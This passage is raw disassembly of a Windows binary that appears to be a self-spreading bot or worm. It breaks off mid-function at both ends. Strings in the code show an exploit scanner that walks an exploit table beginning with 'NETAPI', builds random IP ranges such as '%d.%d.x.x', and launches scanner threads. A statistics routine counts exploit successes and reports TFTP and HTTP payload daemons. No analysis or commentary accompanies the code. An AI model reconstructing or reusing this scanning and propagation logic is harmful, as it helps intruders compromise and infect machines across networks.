		lea	eax, [ebp-224h]	; DATA XREF: sub_4900D7+204w
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_4023DC:				; CODE XREF: .text:004023E1j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4023DC
		push	dword ptr [esi+4]
		sub	eax, ecx
		push	ebx
		mov	[ebp+eax-224h],	dl
		lea	eax, [ebp-124h]
		push	edi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-124h]
		add	esp, 10h
		lea	ecx, [eax+1]	; DATA XREF: p9xindpz:004900A4w
					; sub_4900D7:loc_490104r

loc_402409:				; CODE XREF: .text:0040240Ej
		mov	dl, [eax]

loc_40240B:				; DATA XREF: p9xindpz:004900BFw
					; sub_49012A+11r
		inc	eax
		test	dl, dl
		jnz	short loc_402409 ; DATA	XREF: sub_4900D7+3w
					; sub_4900D7+13r
		push	dword ptr [esi+8]

loc_402413:				; DATA XREF: sub_4900D7+9Bw
					; sub_49048C+3r
		sub	eax, ecx
		mov	[ebp+eax-124h],	dl ; DATA XREF:	sub_4900D7+D2w
		call	sub_404376
		push	dword ptr [esi+0Ch] ; DATA XREF: sub_4900D7+A9r
		mov	[ebp-18h], eax

loc_402427:				; DATA XREF: p9xindpz:004909F3r
					; sub_4900D7+222r
		call	sub_404376
		push	dword ptr [esi+10h]

loc_40242F:				; DATA XREF: p9xindpz:00490A53r
		mov	[ebp-20h], eax
		call	sub_404376

loc_402437:				; DATA XREF: p9xindpz:004908BEr
					; p9xindpz:00490B9Cr
		push	dword ptr [esi+14h]
		mov	[ebp-1Ch], eax	; DATA XREF: sub_4900D7:loc_490271r
		call	sub_404376
		mov	[ebp-24h], eax
		mov	al, [ebp+0Ch]
		add	esp, 10h
		cmp	dword ptr [ebp-20h], 0FFDCh
		mov	[ebp-14h], al
; ---------------------------------------------------------------------------
		db 7Fh,	45h, 6Ah
		db 8, 0E8h, 7Bh
dword_40245B	dd 59000011h		; DATA XREF: sub_4900D7+B7r
					; p9xindpz:00490C52r
		db  89h	; 
		db  85h	; 
		db 0D8h	; 
		db 0FDh	; 
		db 0FFh
		db 0FFh
		db  83h	; 
		db  65h	; e
		db 0FCh	; 
		db    0
		db  85h	; 
		db 0C0h	; 
dword_40246B	dd 0DF682F74h		; DATA XREF: p9xindpz:00490CA4r
		db 0C2h	; 
		db  41h	; A
		db    0
		db  8Dh	; 
		db  8Dh	; 
		db 0DCh	; 
		db 0FDh	; 
		db 0FFh
		db 0FFh
		db 0BFh	; 
		db 0A8h	; 
		db  1Eh
		db  42h	; B
		db    0
		db  8Bh	; 
		db 0F0h	; 
		db 0E8h	; 
		db  8Ah	; 
		db  28h	; (
		db    1
		db    0
		db 0EBh	; 
		db  16h
		db  68h	; h
		db 0ACh	; 
		db 1Eh,	42h, 0
		db 57h			; DATA XREF: sub_4900D7+DFr
; ---------------------------------------------------------------------------
		push	dword ptr [ebp+0Ch]

loc_40248F:				; DATA XREF: p9xindpz:00490A23r
					; sub_4900D7+1C0r
		push	offset dword_428D1C
		call	sub_417FE1	; DATA XREF: sub_4900D7+1DBr
		add	esp, 10h	; DATA XREF: sub_4900D7+1EAr
		call	sub_404C3F	; DATA XREF: sub_4900D7+1F9r
		retn	1Ch		; DATA XREF: sub_4900D7+24Ar
; ---------------------------------------------------------------------------

loc_4024A4:				; DATA XREF: jlrllt49:off_422020o
		push	60h
		mov	eax, offset loc_41CEDC

loc_4024AB:				; DATA XREF: sub_4907D0+24r
		call	sub_404BF5
		mov	eax, [ebp+18h]

loc_4024B3:				; DATA XREF: sub_4900D7+1CEr
		mov	[ebp-68h], eax
		xor	eax, eax
		mov	byte ptr [ebp-30h], 0
		lea	edi, [ebp-2Fh]
		stosd
		stosd
		stosd
		mov	ebx, [ebp+20h]
		stosw
		and	dword ptr [ebp-58h], 0

loc_4024CB:				; DATA XREF: p9xindpz:00490AC6r
					; p9xindpz:00490AE4r
		and	dword ptr [ebp-48h], 0
		stosb
		xor	eax, eax
		mov	byte ptr [ebp-20h], 0
		lea	edi, [ebp-1Fh]
		stosd
		stosd

loc_4024DB:				; DATA XREF: p9xindpz:00490B6Do
		stosd
		stosw
		stosb

loc_4024DF:				; DATA XREF: p9xindpz:00490B87r
		or	edi, 0FFFFFFFFh
		cmp	byte_43737D, 0
		mov	[ebp-50h], ebx
		mov	byte ptr [ebp-41h], 0
		mov	[ebp-5Ch], edi
		mov	[ebp-60h], edi
		mov	[ebp-64h], edi
		mov	[ebp-6Ch], edi
		jnz	short loc_40250B
		call	sub_41C12F
		test	al, al

loc_402505:				; DATA XREF: p9xindpz:0049099Fr
					; p9xindpz:00490B77w
		jz	loc_4029BA

loc_40250B:				; CODE XREF: .text:004024FCj
		cmp	byte_428C14, 0
		jnz	short loc_402521
		call	sub_419997
		test	al, al
		jz	loc_4029BA

loc_402521:				; CODE XREF: .text:00402512j
		and	dword ptr [ebp-54h], 0
		mov	ecx, offset aNetapi ; "NETAPI"
		mov	eax, ecx
		lea	esi, [eax+1]

loc_40252F:				; CODE XREF: .text:00402534j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40252F
		jmp	short loc_40257E
; ---------------------------------------------------------------------------

loc_402538:				; CODE XREF: .text:00402580j
		mov	edx, [ebx+4]
		mov	eax, ecx

loc_40253D:				; CODE XREF: .text:00402555j
		mov	cl, [eax]
		cmp	cl, [edx]
		jnz	short loc_40255B
		test	cl, cl
		jz	short loc_402557
		mov	cl, [eax+1]
		cmp	cl, [edx+1]
		jnz	short loc_40255B
		inc	eax
		inc	eax
		inc	edx
		inc	edx
		test	cl, cl
		jnz	short loc_40253D

loc_402557:				; CODE XREF: .text:00402545j
		xor	eax, eax
		jmp	short loc_40255F
; ---------------------------------------------------------------------------

loc_40255B:				; CODE XREF: .text:00402541j
					; .text:0040254Dj
		sbb	eax, eax
		sbb	eax, edi

loc_40255F:				; CODE XREF: .text:00402559j
		test	eax, eax
		jz	short loc_402584
		inc	dword ptr [ebp-54h]
		mov	ecx, [ebp-54h]
		imul	ecx, 2Ch
		lea	ecx, aNetapi[ecx] ; "NETAPI"
		mov	eax, ecx
		lea	esi, [eax+1]

loc_402577:				; CODE XREF: .text:0040257Cj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402577

loc_40257E:				; CODE XREF: .text:00402536j
		sub	eax, esi
		jnz	short loc_402538
		jmp	short loc_402589
; ---------------------------------------------------------------------------

loc_402584:				; CODE XREF: .text:00402561j
		cmp	[ebp-54h], edi
		jnz	short loc_4025A6

loc_402589:				; CODE XREF: .text:00402582j
		push	offset aScanUnknownExp ; "Scan:	Unknown	Exploit."
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 10h
		jmp	loc_4029BA
; ---------------------------------------------------------------------------

loc_4025A6:				; CODE XREF: .text:00402587j
		mov	esi, [ebx+8]
		mov	eax, esi
		mov	ecx, offset a____0 ; "*.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jz	short loc_4025CB
		push	dword ptr [ebx+0Ch]
		mov	byte ptr [ebp-41h], 1
		call	sub_404376
		pop	ecx
		mov	[ebp-4Ch], eax
		jmp	short loc_402628
; ---------------------------------------------------------------------------

loc_4025CB:				; CODE XREF: .text:004025B7j
		push	esi
		call	sub_404376
		pop	ecx
		push	3
		pop	edx
		cmp	[ebp+1Ch], edx
		mov	[ebp-4Ch], eax
		mov	[ebp-48h], edx
		jl	short loc_402621
		mov	eax, edx

loc_4025E2:				; CODE XREF: .text:0040261Fj
		mov	ecx, [ebp-50h]
		mov	eax, [ecx+eax*4]
		mov	edi, eax
		mov	esi, offset aA_0 ; "-a"
		mov	ecx, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_40266F
		mov	edi, eax
		mov	esi, offset aB	; "-b"
		mov	ecx, edx
		xor	ebx, ebx
		repe cmpsb
		jz	short loc_402621
		mov	edi, eax
		mov	esi, offset aC	; "-c"
		mov	ecx, edx
		xor	eax, eax
		repe cmpsb
		jz	short loc_402675
		inc	dword ptr [ebp-48h]
		movzx	eax, word ptr [ebp-48h]
		cmp	eax, [ebp+1Ch]
		jle	short loc_4025E2

loc_402621:				; CODE XREF: .text:004025DEj
					; .text:00402604j
		mov	dword ptr [ebp-48h], 1

loc_402628:				; CODE XREF: .text:004025C9j
					; .text:00402673j ...
		xor	eax, eax

loc_40262A:				; CODE XREF: .text:00402640j
		cmp	byte_429069[eax], 0
		jz	short loc_402636
		inc	dword ptr [ebp-58h]

loc_402636:				; CODE XREF: .text:00402631j
		add	eax, 124h
		cmp	eax, 0E420h
		jbe	short loc_40262A
		mov	ecx, [ebp-58h]
		mov	eax, 0C8h
		sub	eax, ecx
		cmp	eax, [ebp-4Ch]
		jnb	short loc_40267E
		push	eax
		push	offset aScanNotEnoughT ; "Scan:	Not Enough Threads. %d Available."...
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 14h
		jmp	loc_4029BA
; ---------------------------------------------------------------------------

loc_40266F:				; CODE XREF: .text:004025F5j
		and	dword ptr [ebp-48h], 0
		jmp	short loc_402628
; ---------------------------------------------------------------------------

loc_402675:				; CODE XREF: .text:00402613j
		mov	dword ptr [ebp-48h], 2
		jmp	short loc_402628
; ---------------------------------------------------------------------------

loc_40267E:				; CODE XREF: .text:0040264Fj
		add	[ebp-4Ch], ecx
		cmp	byte ptr [ebp-41h], 0
		jz	loc_4027A5
		mov	eax, [ebp-50h]
		push	dword ptr [eax+8]
		lea	eax, [ebp-30h]
		push	offset dword_421C1C
		push	0Fh
		pop	ebx
		push	ebx
		push	eax
		call	sub_40307C
		lea	eax, [ebp-30h]
		add	esp, 10h
		lea	ecx, [eax+1]

loc_4026AC:				; CODE XREF: .text:004026B1j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4026AC
		sub	eax, ecx
		mov	[ebp+eax-30h], dl
		lea	eax, [ebp-6Ch]
		push	eax
		lea	eax, [ebp-64h]
		push	eax
		lea	eax, [ebp-60h]
		push	eax
		lea	eax, [ebp-5Ch]
		push	eax
		lea	eax, [ebp-30h]
		push	offset aD_D_D_D	; "%d.%d.%d.%d"
		push	eax
		call	sub_403B72
		add	esp, 18h
		cmp	dword ptr [ebp-5Ch], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_4026F4
		push	offset aX_	; "x."
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 0Ch
		jmp	short loc_402706
; ---------------------------------------------------------------------------

loc_4026F4:				; CODE XREF: .text:004026E1j
		push	dword ptr [ebp-5Ch]
		push	offset aD_	; "%d."
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h

loc_402706:				; CODE XREF: .text:004026F2j
		cmp	dword ptr [ebp-60h], 0FFFFFFFFh
		mov	esi, offset aSD_ ; "%s%d."
		mov	edi, offset aSx_ ; "%sx."
		lea	eax, [ebp-20h]
		jnz	short loc_402727
		push	eax
		push	edi
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_402739
; ---------------------------------------------------------------------------

loc_402727:				; CODE XREF: .text:00402717j
		push	dword ptr [ebp-60h]
		push	eax
		push	esi
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 14h

loc_402739:				; CODE XREF: .text:00402725j
		cmp	dword ptr [ebp-64h], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_402750
		push	eax
		push	edi
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_402762
; ---------------------------------------------------------------------------

loc_402750:				; CODE XREF: .text:00402740j
		push	dword ptr [ebp-64h]
		push	eax
		push	esi
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 14h

loc_402762:				; CODE XREF: .text:0040274Ej
		cmp	dword ptr [ebp-6Ch], 0FFFFFFFFh
		lea	eax, [ebp-20h]
		jnz	short loc_40277D
		push	eax
		push	offset aSx	; "%sx"
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 10h
		jmp	short loc_402793
; ---------------------------------------------------------------------------

loc_40277D:				; CODE XREF: .text:00402769j
		push	dword ptr [ebp-6Ch]
		push	eax
		push	offset aSD	; "%s%d"
		lea	eax, [ebp-20h]
		push	ebx
		push	eax
		call	sub_40307C
		add	esp, 14h

loc_402793:				; CODE XREF: .text:0040277Bj
		lea	eax, [ebp-20h]
		lea	edx, [eax+1]

loc_402799:				; CODE XREF: .text:0040279Ej
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_402799
		jmp	loc_40287E
; ---------------------------------------------------------------------------

loc_4027A5:				; CODE XREF: .text:00402685j
		push	dword_428D1C
		mov	byte ptr [ebp-40h], 0
		xor	eax, eax
		lea	edi, [ebp-3Fh]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp-40h]
		stosb
		call	sub_419C46
		xor	eax, eax
		lea	edi, [ebp-30h]
		stosd
		stosd
		stosd
		stosd
		mov	eax, esi
		push	eax
		push	offset dword_421C1C
		push	0Fh
		pop	esi
		lea	eax, [ebp-30h]
		push	esi
		push	eax
		call	sub_40307C
		lea	eax, [ebp-30h]
		add	esp, 14h
		lea	ecx, [eax+1]

loc_4027E9:				; CODE XREF: .text:004027EEj
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_4027E9
		sub	eax, ecx
		mov	[ebp+eax-30h], dl
		lea	eax, [ebp-6Ch]
		push	eax
		lea	eax, [ebp-64h]
		push	eax
		lea	eax, [ebp-60h]
		push	eax
		lea	eax, [ebp-5Ch]
		push	eax
		lea	eax, [ebp-30h]
		push	offset aD_D_D_D	; "%d.%d.%d.%d"
		push	eax
		call	sub_403B72
		mov	eax, [ebp-48h]
		add	esp, 18h
		sub	eax, 0
		jz	short loc_40285C
		dec	eax
		jz	short loc_402842
		dec	eax
		jnz	short loc_402871
		push	dword ptr [ebp-64h]
		lea	eax, [ebp-20h]
		push	dword ptr [ebp-60h]
		push	dword ptr [ebp-5Ch]
		push	offset aD_D_D_x	; "%d.%d.%d.x"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 18h
		jmp	short loc_402871
; ---------------------------------------------------------------------------

loc_402842:				; CODE XREF: .text:00402820j
		push	dword ptr [ebp-60h]
		lea	eax, [ebp-20h]
		push	dword ptr [ebp-5Ch]
		push	offset aD_D_x_x	; "%d.%d.x.x"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 14h
		jmp	short loc_402871
; ---------------------------------------------------------------------------

loc_40285C:				; CODE XREF: .text:0040281Dj
		push	dword ptr [ebp-5Ch]
		lea	eax, [ebp-20h]
		push	offset aD_x_x_x	; "%d.x.x.x"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 10h

loc_402871:				; CODE XREF: .text:00402823j
					; .text:00402840j ...
		lea	eax, [ebp-20h]
		lea	edx, [eax+1]

loc_402877:				; CODE XREF: .text:0040287Cj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_402877

loc_40287E:				; CODE XREF: .text:004027A0j
		sub	eax, edx
		cmp	byte ptr [ebp-41h], 0
		mov	byte ptr [ebp+eax-20h],	0
		mov	eax, [ebp-50h]
		jz	short loc_402893
		push	dword ptr [eax+0Ch]
		jmp	short loc_402896
; ---------------------------------------------------------------------------

loc_402893:				; CODE XREF: .text:0040288Cj
		push	dword ptr [eax+8]

loc_402896:				; CODE XREF: .text:00402891j
		call	sub_404376
		push	eax
		mov	eax, [ebp-54h]
		imul	eax, 2Ch
		push	dword_425548[eax]
		lea	eax, [ebp-20h]
		push	eax
		push	offset aScanSDUsingDTh ; "Scan:	%s:%d Using %d Threads."
		push	dword ptr [ebp-68h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 20h
		call	sub_419F7B
		mov	ecx, [ebp-4Ch]
		cmp	[ebp-58h], ecx
		jnb	loc_4029BA
		mov	eax, [ebp-58h]
		imul	eax, 124h
		sub	ecx, [ebp-58h]
		mov	[ebp-50h], eax
		mov	[ebp-4Ch], ecx
		mov	esi, eax

loc_4028E9:				; CODE XREF: .text:004029B4j
		push	124h
		lea	ebx, dword_429058[esi]
		lea	edi, [ebx-100h]
		push	0
		push	edi
		call	sub_408130
		lea	eax, [ebp-30h]
		push	eax
		push	offset dword_421C1C
		push	0Fh
		push	ebx
		call	sub_40307C
		mov	eax, ebx
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_40291B:				; CODE XREF: .text:00402920j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_40291B
		push	dword ptr [ebp-68h]
		sub	eax, ecx
		mov	byte ptr dword_429058[esi+eax],	dl
		mov	al, [ebp-41h]
		push	offset dword_421C1C
		mov	[ebx+12h], al
		mov	eax, [ebp-48h]
		push	0FFh
		push	edi
		mov	[ebx+18h], eax
		call	sub_40307C
		mov	eax, edi
		add	esp, 10h
		lea	ecx, [eax+1]

loc_402952:				; CODE XREF: .text:00402957j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_402952
		sub	eax, ecx
		mov	byte_428F58[esi+eax], dl
		mov	al, [ebp+0Ch]
		mov	[ebx+10h], al
		mov	eax, [ebp-54h]
		push	8
		mov	byte ptr [ebx+11h], 1
		mov	[ebx+14h], eax
		call	sub_4035D9
		pop	ecx
		mov	[ebp-58h], eax
		and	dword ptr [ebp-4], 0
		test	eax, eax
		jz	short loc_40299D
		mov	ecx, edi
		push	offset sub_413FED
		mov	edi, offset aScanner ; "Scanner"
		mov	esi, eax
		call	sub_414D0E
		mov	esi, [ebp-50h]
		jmp	short loc_40299F
; ---------------------------------------------------------------------------

loc_40299D:				; CODE XREF: .text:00402983j
		xor	eax, eax

loc_40299F:				; CODE XREF: .text:0040299Bj
		or	dword ptr [ebp-4], 0FFFFFFFFh
		mov	eax, [eax]
		add	esi, 124h
		dec	dword ptr [ebp-4Ch]
		mov	[ebx+20h], eax
		mov	[ebp-50h], esi
		jnz	loc_4028E9

loc_4029BA:				; CODE XREF: .text:loc_402505j
					; .text:0040251Bj ...
		call	sub_404C3F
		retn	1Ch
; ---------------------------------------------------------------------------
		push	ebp
		mov	ebp, esp
		and	esp, 0FFFFFFF8h
		sub	esp, 1Ch
		and	dword ptr [esp], 0
		push	ebx
		push	esi
		mov	ebx, offset dword_437688
		push	edi
		mov	[esp+18h], ebx

loc_4029DB:				; CODE XREF: .text:00402A45j
					; .text:00402A62j ...
		mov	eax, dword_43768C
		mov	eax, [eax]
		mov	[esp+14h], eax
		mov	[esp+10h], ebx

loc_4029EA:				; CODE XREF: .text:00402A29j
		mov	eax, dword_43768C
		lea	edi, [esp+18h]
		lea	esi, [esp+10h]
		mov	[esp+1Ch], eax
		call	sub_40169D
		test	al, al
		jz	short loc_402A7D
		mov	edi, offset aScanner ; "Scanner"
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	8
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [esp+10h]
		jz	short loc_402A2B
		lea	edi, [esp+20h]
		call	sub_40166F
		jmp	short loc_4029EA
; ---------------------------------------------------------------------------

loc_402A2B:				; CODE XREF: .text:00402A1Ej
		call	sub_40164F
		mov	edi, [eax+40h]
		lea	esi, [esp+10h]
		call	sub_40164F
		mov	eax, [eax]
		call	sub_414C86
		test	al, al
		jz	short loc_4029DB
		xor	eax, eax
		xor	ecx, ecx

loc_402A4B:				; CODE XREF: .text:00402A60j
		cmp	dword_429078[ecx], edi
		jz	short loc_402A67
		add	ecx, 124h
		inc	eax
		cmp	ecx, 0E420h
		jbe	short loc_402A4B
		jmp	loc_4029DB
; ---------------------------------------------------------------------------

loc_402A67:				; CODE XREF: .text:00402A51j
		inc	dword ptr [esp+0Ch]
		imul	eax, 124h
		mov	byte_429069[eax], 0
		jmp	loc_4029DB
; ---------------------------------------------------------------------------

loc_402A7D:				; CODE XREF: .text:00402A02j
		push	dword ptr [esp+0Ch]
		push	offset aScanAllScanThr ; "Scan:	All Scan Threads Stopped. %d kill"...
		push	dword ptr [ebp+18h]
		push	dword ptr [ebp+0Ch]
		push	offset dword_428D1C
		call	sub_417FE1
		add	esp, 14h
		pop	edi
		pop	esi
		pop	ebx
		mov	esp, ebp
		pop	ebp
		retn	1Ch

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=188h


sub_402AA2	proc near		; DATA XREF: jlrllt49:off_422030o

var_208		= dword	ptr -208h
var_204		= byte ptr -204h
var_203		= byte ptr -203h
var_4		= dword	ptr -4
arg_4		= dword	ptr  0Ch
arg_10		= dword	ptr  18h

		push	ebp
		lea	ebp, [esp-188h]
		sub	esp, 208h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+188h+var_4], eax
		mov	eax, [ebp+188h+arg_10]
		push	esi
		push	edi
		mov	esi, 1FFh
		push	esi
		mov	[ebp+188h+var_208], eax
		lea	eax, [ebp+188h+var_203]
		push	0
		push	eax
		mov	[ebp+188h+var_204], 0
		call	sub_408130
		push	offset aStatisticsExpl ; "Statistics: Exploits:"
		lea	eax, [ebp+188h+var_204]
		push	esi
		push	eax
		xor	edi, edi
		call	sub_40307C
		add	esp, 18h
		xor	eax, eax

loc_402AF3:				; CODE XREF: sub_402AA2+7Ej
		push	dword_42554C[eax]
		lea	eax, aNetapi[eax] ; "NETAPI"
		push	eax
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSSD	; "%s %s: %d"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 18h
		inc	edi
		mov	eax, edi
		imul	eax, 2Ch
		cmp	dword_425548[eax], 0
		jnz	short loc_402AF3
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSDaemons ; "%s;	Daemons:"
		push	esi
		push	eax
		call	sub_40307C
		push	dword_437384
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSTftpD	; "%s TFTP: %d"
		push	esi
		push	eax
		call	sub_40307C
		push	dword_437378
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset aSHttpD	; "%s HTTP: %d"
		push	esi
		push	eax
		call	sub_40307C
		add	esp, 38h
		lea	eax, [ebp+188h+var_204]
		pop	edi
		lea	edx, [eax+1]
		pop	esi

loc_402B69:				; CODE XREF: sub_402AA2+CCj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_402B69
		sub	eax, edx
		mov	[ebp+eax+188h+var_204],	cl
		lea	eax, [ebp+188h+var_204]
		push	eax
		push	offset dword_421C1C
		push	[ebp+188h+var_208]
		push	[ebp+188h+arg_4]
		push	offset dword_428D1C
		call	sub_417FE1
		mov	ecx, [ebp+188h+var_4]
		xor	ecx, ebp
		add	esp, 14h
		call	sub_402C9E
		add	ebp, 188h
		leave
		retn	1Ch
sub_402AA2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BAC	proc near		; CODE XREF: sub_41BB5A+A6p
		jmp	ds:dword_41E1D8
sub_402BAC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BB2	proc near		; CODE XREF: sub_41BB5A+149p
		jmp	ds:dword_41E1D4
sub_402BB2	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BB8	proc near		; CODE XREF: sub_41BB5A+76p
					; sub_41BB5A+B9p ...
		jmp	ds:dword_41E1D0
sub_402BB8	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BBE	proc near		; CODE XREF: sub_41BB5A+C8p
					; sub_41BB5A+1C0p ...
		jmp	ds:dword_41E1CC
sub_402BBE	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BC4	proc near		; CODE XREF: sub_41BB5A+1B1p
		jmp	ds:dword_41E1C8
sub_402BC4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BCA	proc near		; CODE XREF: sub_41452B+88p
					; sub_41452B+C5p
		jmp	ds:dword_41E260
sub_402BCA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BD0	proc near		; CODE XREF: sub_41B423+B2p
		jmp	ds:dword_41E1C0
sub_402BD0	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_402BD6	proc near		; CODE XREF: sub_401C1D+16p
					; sub_417C06+24p ...
		jmp	sub_4035D9
sub_402BD6	endp


; =============== S U B	R O U T	I N E =======================================



sub_402BDB	proc near		; DATA XREF: jlrllt49:00422814o
		mov	dword ptr [ecx], offset	off_41E358
		jmp	sub_40109A
sub_402BDB	endp

; ---------------------------------------------------------------------------

loc_402BE6:				; DATA XREF: jlrllt49:off_41E358o
		push	esi
		mov	esi, ecx
		mov	dword ptr [esi], offset	off_41E358
		call	sub_40109A
		test	byte ptr [esp+8], 1
		jz	short loc_402C02
		push	esi
		call	sub_4034FB
		pop	ecx

loc_402C02:				; CODE XREF: .text:00402BF9j
		mov	eax, esi
		pop	esi
		retn	4

; =============== S U B	R O U T	I N E =======================================



sub_402C08	proc near		; CODE XREF: sub_401337+Dp
		push	44h
		mov	eax, offset loc_41CD93
		call	sub_404B8C
		push	offset aStringTooLong ;	"string	too long"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_422EF8
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41E34C
		call	sub_40477B
		int	3		; Trap to Debugger
sub_402C08	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402C47	proc near		; CODE XREF: sub_401141+13p
					; sub_4012AC+Fp
		push	44h
		mov	eax, offset loc_41CD93
		call	sub_404B8C
		push	offset aInvalidStringP ; "invalid string position"
		lea	ecx, [ebp-28h]
		call	sub_401420
		and	dword ptr [ebp-4], 0
		lea	eax, [ebp-28h]
		push	eax
		lea	ecx, [ebp-50h]
		call	sub_401065
		push	offset dword_422810
		lea	eax, [ebp-50h]
		push	eax
		mov	dword ptr [ebp-50h], offset off_41E358
		call	sub_40477B
		int	3		; Trap to Debugger
		push	esi
		push	dword ptr [esp+8]
		mov	esi, ecx
		call	sub_4013E6
		mov	dword ptr [esi], offset	off_41E358
		mov	eax, esi
		pop	esi
		retn	4
sub_402C47	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_402C9E	proc near		; CODE XREF: sub_401DED+9Ap
					; sub_401E90+60p ...
		cmp	ecx, dword_424064
		jnz	short loc_402CA8
		rep retn
; ---------------------------------------------------------------------------

loc_402CA8:				; CODE XREF: sub_402C9E+6j
		jmp	sub_404C4E
sub_402C9E	endp


; =============== S U B	R O U T	I N E =======================================



sub_402CAD	proc near		; CODE XREF: sub_402D64+Dp
					; sub_402E87+1Ap ...

arg_0		= dword	ptr  4

		mov	eax, [esp+arg_0]
		test	eax, eax
		push	esi
		mov	esi, ecx
		mov	byte ptr [esi+0Ch], 0
		jnz	short loc_402D1F
		call	sub_40595D
		mov	[esi+8], eax
		mov	ecx, [eax+6Ch]
		mov	[esi], ecx
		mov	ecx, [eax+68h]
		mov	[esi+4], ecx
		mov	ecx, [esi]
		cmp	ecx, off_424678
		jz	short loc_402CEB
		mov	ecx, dword_424594
		test	[eax+70h], ecx
		jnz	short loc_402CEB
		call	sub_405671
		mov	[esi], eax

loc_402CEB:				; CODE XREF: sub_402CAD+2Aj
					; sub_402CAD+35j
		mov	eax, [esi+4]
		cmp	eax, dword_424498
		jz	short loc_402D0C
		mov	eax, [esi+8]
		mov	ecx, dword_424594
		test	[eax+70h], ecx
		jnz	short loc_402D0C
		call	sub_404F60
		mov	[esi+4], eax

loc_402D0C:				; CODE XREF: sub_402CAD+47j
					; sub_402CAD+55j
		mov	eax, [esi+8]
		test	byte ptr [eax+70h], 2
		jnz	short loc_402D29
		or	dword ptr [eax+70h], 2
		mov	byte ptr [esi+0Ch], 1
		jmp	short loc_402D29
; ---------------------------------------------------------------------------

loc_402D1F:				; CODE XREF: sub_402CAD+Dj
		mov	ecx, [eax]
		mov	[esi], ecx
		mov	eax, [eax+4]
		mov	[esi+4], eax

loc_402D29:				; CODE XREF: sub_402CAD+66j
					; sub_402CAD+70j
		mov	eax, esi
		pop	esi
		retn	4
sub_402CAD	endp


; =============== S U B	R O U T	I N E =======================================



sub_402D2F	proc near		; CODE XREF: sub_402D64+86p
					; sub_402E37+39j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

		mov	edx, [esp+arg_4]
		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi

loc_402D39:				; CODE XREF: sub_402D2F+2Ej
		movzx	eax, byte ptr [esi]
		lea	ecx, [eax-41h]
		inc	esi
		cmp	ecx, 19h
		ja	short loc_402D48
		add	eax, 20h

loc_402D48:				; CODE XREF: sub_402D2F+14j
		movzx	ecx, byte ptr [edx]
		lea	edi, [ecx-41h]
		inc	edx
		cmp	edi, 19h
		ja	short loc_402D57
		add	ecx, 20h

loc_402D57:				; CODE XREF: sub_402D2F+23j
		test	eax, eax
		jz	short loc_402D5F
		cmp	eax, ecx
		jz	short loc_402D39

loc_402D5F:				; CODE XREF: sub_402D2F+2Aj
		pop	edi
		sub	eax, ecx
		pop	esi
		retn
sub_402D2F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_402D64	proc near		; CODE XREF: sub_402E37+45p
					; sub_40ED5A+8Fp

var_10		= dword	ptr -10h
var_8		= dword	ptr -8
var_4		= byte ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
